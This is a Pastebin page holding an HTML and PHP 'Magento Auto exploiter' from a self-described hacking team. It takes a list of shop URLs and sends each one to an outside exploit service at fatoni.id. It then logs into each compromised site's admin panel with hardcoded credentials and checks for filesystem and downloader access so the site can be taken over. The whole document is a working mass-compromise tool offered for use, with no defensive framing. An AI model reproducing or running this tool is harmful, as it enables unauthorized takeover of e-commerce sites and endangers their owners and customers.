Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <script type="text/javascript" src="http://ahmad-rifai-
- tools.googlecode.com/files/salju-blog.ahmadrifai.net.js" /></script>
- <script type="text/javascript" src="//www.blogger.com/static/v1/common/js/3287480799-
- csitail.js"></script>
- <script type="text/javascript">BLOG_initCsi('classic_blogspot');</script>
- <style type="text/css">.cakrahide {z-index: 1000;height: 15px;width: 280px;border: 2px solid #666666;background: #D11717
- -moz-linear-gradient(top,#000,#D11717);background: -webkit-gradient(linear, left top, left bottom, from(#000), to(#D11717));border-radius: 12px;-moz-border-radius:
- 12px;-webkit-border-radius: 12px;-o-transition: all 1s ease-in-out;-moz-transition: all 1s ease-in-out;-webkit-transition: all 1s ease-in-out;padding: 5px 5px;margin:
- 15px auto;font: 8px Metamorphous;color: #FF0000;overflow: hidden;box-shadow: 0 1px 8px #000;-moz-box-shadow: 0 1px 8px #000;-webkit-box-shadow: 0 1px 8px
- #000;}.cakrahide:hover {min-height: 270px;border: 2px solid #333333;background: #111;box-shadow: 0 1px 15px #000;-moz-box-shadow: 0 1px 15px #000;-webkit-box-shadow: 0
- 1px 15px #000;color: #000; text-shadow: 0 1px 1px #888;}.cakrahide h3, .isicakra h3 {font-size: 8px;font-family: Metamorphous;font-weight: bold;color:
- #ffffff;text-align: center;text-shadow: 0px 1px 1px #fff; margin: 3px 5px;background: #000;border-radius: 5px;-moz-border-radius: 5px;-webkit-border-radius:
- 5px;border: 1px solid #999;-o-transition: all 1s ease-in-out;-moz-transition: all 1s ease-in-out;-webkit-transition: all 1s ease-in-out;}.tejahide h3:hover
- {box-shadow: 0 1px 8px #000;-moz-box-shadow: 0 1px 8px #000;-webkit-box-shadow: 0 1px 8px #000;}.cakrahide img.mini, .cakrahide img.minianima {width: 70px;border: 4px
- solid #666;padding: 3px;border-radius: 6px;-moz-border-radius: 6px;-webkit-border-radius: 6px;float: left; margin: 0 10px 5px 0;background: #222;-o-transition: all
- 1.5s;-moz-transition: all 1.5s;-webkit-transition: all 1.5s;}.cakrahide img.mini:hover, .cakrahide img.minianima:hover {box-shadow: 1px 1px 15px #000;-moz-box-shadow:
- 1px 1px 15px #000;-webkit-box-shadow: 1px 1px 15px #000;border: 4px solid #CCCCCC;background :#666;-o-transform: scale(1.4);-moz-transform:
- scale(1.4);-webkit-transform: scale(1.4);margin-top: 20px;margin-left: 15px;}.tejahide img.minianima:hover {-o-transform: scale(1.4) rotate(360deg)
- translate(0px);-moz-transform: scale(1.4) rotate(360deg) translate(0px);-webkit-transform: scale(1.4) rotate(360deg) translate(0px);}.isicakra {margin-top:
- 15px;height:225px;overflow: auto;padding: 0 5px;-o-transition: all 1s ease-in-out;-moz-transition: all 1s ease-in-out;-webkit-transition: all 1s ease-in-out;
- background:#ddd -moz-linear-gradient(top,#ddd,#000);background:-webkit-gradient(linear, left top, left bottom, from(#ddd), to(#000));}.isicakra:hover {background:
- #333;color: #eee;text-shadow: 0 0px 1px #fe0303;}.isicakra h3 {margin: 20px 0;max-width: 224px;margin-left:10px;background: #000;box-shadow: 0 1px 12px
- #eee;-moz-box-shadow: 0 1px 12px #eee;-webkit-box-shadow: 0 1px 12px #eee;}.columns{clear:both;line-height:22px;padding:0 0
- 20px;width:250px}.colleft{float:left;line-height:22px;width:120px}.colright{float:right;line-height:22px;width:120px}.isicakra h3:hover {background: #888;border: 1px
- solid #666;box-shadow: 0 1px 12px #fff;-moz-box-shadow: 0 1px 12px #fff;-webkit-box-shadow: 0 1px 12px #fff;}.isicakra ul {padding: 0;margin: 0;list-style:
- none;}.isicakra li {padding: 0;margin: 0;list-style: none;border-bottom:1px dotted #777;}.isicakra li a{color: #FF0000;padding: 0;margin:
- 0;text-decoration:none;font-size: 12px;-o-transition: all 1.5s;-moz-transition: all 1.5s;-webkit-transition: all 1.5s;}.isicakra li a:hover {-o-transform:
- scale(1.1);-moz-transform: scale(1.1);-webkit-transform: scale(1.1);color: red;text-shadow: 0 1px 1px #000;margin-left: 20px;}.cakrahide {height: 17px; float:right
- ;margin-top:0px;z-index: 10000;position: fixed;top:0px;margin-left:690px;} .cakrahide h3, .isicakra {font-size: 11px;}</style>
- <div class="cakrahide">
- <h3>Contact Me click here!</h3>
- <div class="isicakra">
- <h3>Welcome</h3>
- My name WE N DI a.k.a Unknown7
- <div class="columns">
- <div class="colleft">
- <h3>FansPage my Team</h3>
- <ul>
- <li><a rel="nofollow" href="https://www.facebook.com/RabbitSecOfficial/?fref=ts" target="_blank" title="INDONESIAN CODE PARTY</a></li>
- </ul>
- </div>
- <div class="colright">
- <h3>Social</h3>
- <ul>
- <li><a rel="nofollow" href="https://www.facebook.com/Unknown7.go.id?fref=ts" target="_blank" title="HANDOKO FUJI">Facebook</a></li>
- </ul>
- </div>
- </div>
- </div>
- </div>
- </div>
- <div class='clear'></div>
- <span class='widget-item-control'>
- <span class='item-control blog-admin'>
- <center><h1>Magento Auto exploiter</h1>
- <style>html{display:table;height:100%;width:100%;}body{display:table-row;}body{display:table-cell;vertical-align:middle;text-align:center;}a:link{text-decoration:none;}body {background: url(https://images7.alphacoders.com/392/392510.jpg);margin:0;padding:0;background-size:100% 100%}</style>
- <?php
- function cover() {
- return "<center>[+] Magento Auto Exploit [+]<br>
- ## -= Rabbit Security Team - Sanjungan Jiwa =- ##<br>
- ## ##<br><br></center>";
- }
- function ngcurl($url,$post=null) {
- $ch = curl_init($url);
- if($post != null) {
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
- }
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
- curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
- curl_setopt($ch, CURLOPT_COOKIESESSION, true);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
- curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
- return curl_exec($ch);
- curl_close($ch);
- }
- function ambilKata($param, $kata1, $kata2){
- if(strpos($param, $kata1) === FALSE) return FALSE;
- if(strpos($param, $kata2) === FALSE) return FALSE;
- $start = strpos($param, $kata1) + strlen($kata1);
- $end = strpos($param, $kata2, $start);
- $return = substr($param, $start, $end - $start);
- return $return;
- }
- echo cover();
- ?>
- <?php
- $link = explode("\r\n", $_POST['target']);
- $go = $_POST['go'];
- if(isset($go)) {
- foreach($link as $url) {
- $post_to_fatoni = array(
- "url" => $url,
- "hajar" => "Xploit!",
- );
- $curl_fatoni = ngcurl("http://fatoni.id/malangXploit.php", $post_to_fatoni);
- if(preg_match("/Exploiting Success, mulai mengecek login../", $curl_fatoni)) {
- echo "Target: <a href='$url' target='_blank'>$url</a><br>";
- echo "Status: Sukses Di Xploit<br>";
- echo "Ngecek Login........ ";
- $ambil = htmlspecialchars(@file_get_contents($url));
- preg_match("/<input name=\"form_key\" type=\"hidden\" value=\"(.*?)\">/", $ambil, $key);
- $post_login = array(
- "form_key" => $key[1],
- "login[username]" => "nyanazunyan",
- "dummy" => "",
- "login[password]" => "nyan187",
- );
- $login = ngcurl($url."/admin/", $post_login);
- if(preg_match("/Log Out|malang/", $login)) {
- $key2 = ambilKata($login,"/filesystem/adminhtml_filesystem/index/key/","/");
- $key3 = ambilKata($login,"/system_account/index/key/","/");
- echo "OK<br>";
- echo "username: malang<br>";
- echo "password: malang87<br>";
- echo "Filesystem: ";
- $curl_filesystem = ngcurl($url."/filesystem/adminhtml_filesystem/index/key/$key2/", null);
- if(preg_match("/File System/", $curl_filesystem)) {
- echo "Ada<br>";
- } else {
- echo "Gaada<br>";
- }
- echo "Downloader: ";
- $post_downloader = array(
- "username" => "malang",
- "password" => "malang87",
- );
- $url_d = parse_url($url, PHP_URL_HOST);
- $curl_downloader = ngcurl($url_d."/downloader/", $post_downloader);
- if(preg_match("/Return to Admin|Log Out/i", $curl_downloader)) {
- if(preg_match("/Your Magento folder does not have sufficient write permissions./", $curl_downloader)) {
- $stat_down = "<font color=red>Permissions</font>";
- } else {
- $stat_down = "<font color='#008000'>Permissions</font>";
- }
- echo "Ada [ <a href='http://$url_d/downloader/' target='_blank'>http://$url_d/downloader/</a> ( $stat_down ) ]<br>";
- } else {
- echo "Gaada<br>";
- }
- } else {
- echo "Gagal<br>";
- }
- echo "<br>";
- } else {
- echo "Target: $url<br>";
- echo "Status: Gagal Di Xploit<br><br>";
- }
- }
- } else {
- ?>
- <html>
- <center>
- <form method="post">
- <textarea name="target" placeholder="http://monkeyshop.be/" style="width: 500px; height: 250px;"></textarea><br>
- <input type="submit" name="go" value="Xploit" style="width: 500px;">
- </form>
- </center>
- </html>
- <?php
- }
- ?>
- TUTORIAL ---->>
- http://gracygirl.com/baca.txt
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement